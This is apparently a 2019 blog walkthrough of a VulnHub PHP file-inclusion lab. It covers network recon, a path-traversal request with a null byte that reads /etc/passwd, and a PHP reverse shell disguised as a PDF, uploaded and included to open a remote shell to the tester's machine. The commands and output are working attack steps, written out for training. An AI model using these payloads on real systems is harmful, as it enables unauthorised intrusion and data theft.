10.4 : Web app exploitation - Local file inclusion (Part IV)

J0eii

2019-11-05

Pen-Testing

Cracking PHP Include And Post Exploitation lab

Before we start cracking Web app, lets try to crack PHP Include And Post Exploitation lab.

Download here, php_include_and_post_exploitation.iso , mount as live CD
https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/

Recon

We can use the traditional netdiscover for basic sniff, and nmap for detailed sniff.

netdiscover

 Currently scanning: 172.16.138.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor
 192.168.56.100  08:00:27:75:46:19      1      60  PCS Systemtechnik GmbH
 192.168.56.104  08:00:27:b0:86:4d      1      60  PCS Systemtechnik GmbH

192.168.56.104 is our target.

nmap

root@kali:/etc/nginx# nmap -sSV --version-intensity 9 192.168.56.104
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-05 20:31 PST
Nmap scan report for 192.168.56.104
Host is up (0.00024s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.16 ((Debian))
MAC Address: 08:00:27:B0:86:4D (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.89 seconds

Only the port 80 is open for attack.

Screen-Shot-2019-11-06-at-12.38.55-PM

CVE & Vul scanning

nikto

nikto -h 192.168.56.104
root@kali:/etc/nginx# nikto -h 192.168.56.104
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        80
+ Start Time:         2019-11-05 21:11:19 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the M
IME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?
id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0
.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from
 any IP. This is typically only found on port 4080.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain s
pecific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain s
pecific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain s
pecific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain s
pecific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 3513, size: 5108, mtime: Tue Aug 28 03:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8725 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2019-11-05 21:11:32 (GMT-8) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Lets try local file inclusion

curl --path-as-is http://192.168.56.104/index.php?page=../../../../../../../../etc/passwd

  <div class="block" id="block-text">
    <div class="secondary-navigation">

      <div class="content">

Warning: include(../../../../../../../../etc/passwd.php): failed to open stream: No such file or directory in /var/www/index.php on line 28

Warning: include(): Failed opening '../../../../../../../../etc/passwd.php' for inclusion (include_path='.:') in /var/www/index.php on line 28
     </div>

    </div>
  </div>




        <div id="footer">
          <div class="block">
            <p>Copyright </p>
          </div>
        </div>

      </div>

In old version of php, the %00 null byte attack works to break the file inclusion.
https://security.stackexchange.com/questions/66414/getting-null-byte-injection-attacks-to-work-with-php-5-2-17

lets try this again.

root@kali:/etc/nginx# curl --path-as-is http://192.168.56.104/index.php?page=../../../../../../../../etc/passwd%00

  <div class="block" id="block-text">
    <div class="secondary-navigation">

      <div class="content">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash
     </div>

    </div>
  </div>

Upload reverse shell & craft a PDF attack vector

Got it… Also we can craft a php reverse shell and try to upload it.

For this case, we are using pentest monkey reverse shell
https://github.com/pentestmonkey/php-reverse-shell

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php > shell.pdf

Edit it with your favourite text editor, and we add %PDF-1.4 to camouflage it. Also, we need to change the connection string.

%PDF-1.4

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
....
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.101';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

It should be something like this.

Lets back to your kali linux, and start listening on port 4444

root@kali:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

upload it the shell.pdf and go to 192.168.56.104/index.php?page=uploads/shell.pdf%00

Screen-Shot-2019-11-06-at-1.24.47-PM

root@kali:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.56.104.
Ncat: Connection from 192.168.56.104:33439.
Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
 05:24:23 up 57 min,  6 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
user     tty2                      04:27   56:59   0.00s  0.00s -bash
user     tty3                      04:27   56:59   0.00s  0.00s -bash
user     tty4                      04:27   56:59   0.00s  0.00s -bash
user     tty5                      04:27   56:59   0.00s  0.00s -bash
user     tty6                      04:27   56:59   0.00s  0.00s -bash
user     tty1                      04:27   56:59   0.00s  0.00s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data

Got it.